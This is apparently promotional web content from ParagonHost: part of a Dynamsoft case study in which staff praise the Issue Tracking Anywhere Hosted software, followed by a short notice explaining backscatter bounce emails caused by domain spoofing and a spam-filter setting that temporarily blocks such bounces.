The development team at ParagonHost happily embraced the new process. “I was thrilled when Dave brought this on board,” remarked David J. Barrus, VP Web Development and Co-Founder at ParagonHost. “I knew that by implementing Issue Tracking Anywhere, it would help our company be faster and more efficient.”

Another measure was the usability of the product for all types of users. “These types of
products are easy for people such as Dave and myself who have a technology background
of 25-30 years,” explained Barrus. “However, if we are working with a designer who may
not be very technical or if we are dealing with a language barrier, then we need a product
that is easy to use for all types of users. Issue Tracking Anywhere is so straightforward
that anybody from any part of the world can understand it and move forward quickly.”

Since implementing Issue Tracking Anywhere Hosted, the team at ParagonHost has seen
improved control and management of milestones for web development projects. “The ability
to track an issue or track a piece of information faster has noticeably affected our time
to market and response time on projects,” remarked Safley. “By using Issue Tracking Anywhere
Hosted, along with SourceAnywhere Hosted, our project timelines and/or milestones
have been met or shortened substantially.”

With Issue Tracking Anywhere’s robust search capabilities, the team at ParagonHost has
found it much easier and faster to use than the previous system. This has saved the team
a lot of time. “Everything is more organized,” commented Safley. “By using Issue Tracking
Anywhere we are able to track resources, notes, and bugs and this has resulted in quicker
timelines and better code management.” Barrus continued, “With a more advanced
search function, we are able to locate information quickly. And, of course, in our business
time is money.”

A surprising discovery was the editing capability. “The editor is pretty amazing,” remarked
Safley. “We are finding that when we copy and paste source code and things like that from
different web sites and resources, it keeps the format of the copied content. And it even
allows us to easily “clean up” the code. We really like that capability.”

Safley concluded, “Dynamsoft’s products enable us to consistently provide World Class
Internet Services to our present and future clients.”

Dynamsoft Corporation is the leading developer of version control and issue tracking software.
Many Fortune 500 companies including HP, IBM and Intel use Dynamsoft solutions
for version control, issue tracking.

Issue Tracking Anywhere™ Hosted is a web-based issue tracking system designed for
issue/work item tracking, bug/defect tracking, customer support and project management.
It is hosted and fully managed by Dynamsoft.

ParagonHost, LLC
www.ParagonHost.com
866-412-HOST
sales [at] paragonhost.com

Dynamsoft Corporation
www.dynamsoft.com
877-605-5491
info [at] dynamsoft.com

Increase in NDR (Bounce) Messages

Over the last several weeks there has been a major increase in the quantity of “backscatter” junk email – specifically, undeliverable email notices (also known as Non-Delivery Receipts).

This generally occurs when spammers ’spoof’ a valid domain as the supposed ‘From’ address of the junk mail messages. When the junk mail messages are sent to non-existent email addresses, the receiving mail server sends a bounce message to the supposed sender of that junk mail, i.e. to the unsuspecting domain that was spoofed. Given the very high volume of junk mail that spammers send, the unfortunate spoofed domain can see a large number of these bounce messages.

Unfortunately, there is no way to prevent a spammer from spoofing any email address that they want to use. (Techniques such as DKIM authentication or SPF will help identify those messages as spam, but they do not prevent the spammer from sending those messages in the first place.) Similarly, there is no way to prevent mail servers that receive these junk messages from sending bounce messages to that spoofed domain.

These bounce messages can be difficult for a spam filter to block, as these bounces generally look very similar to ‘legitimate’ bounce messages that people receive if they mistakenly send an email to a nonexistent address. Sometimes there is enough left over ’spammy’ content in the bounce messages that the messages can be identified as junk mail, but it generally does not make sense to block all bounce messages as an ongoing, long-term policy, due to the risk of blocking the occasional ‘legitimate’ bounce messages as well.

(TSB) TheSpamBusters.com has added a mechanism that allows us to temporarily block all bounce messages for a domain, so that if or when a domain has been spoofed, an administrator can simply change one setting in the web interface and all the bounce messages to that domain will be temporarily handled as junk mail. After a day or two (when the bounce messages subside), this setting can be disabled.

*** If you would like more information on how to protect scrub your email and add protection from Spam Mail before it reachs your computer, contact The Spam Busters a Service of ParagonHost, LLC (866) 412-HOST (4678)

ParagonHost, LLC

http://www.ParagonHost.com

“World Class Internet Services”

(866) 412-HOST (4678)

Bounced Email or Backscatter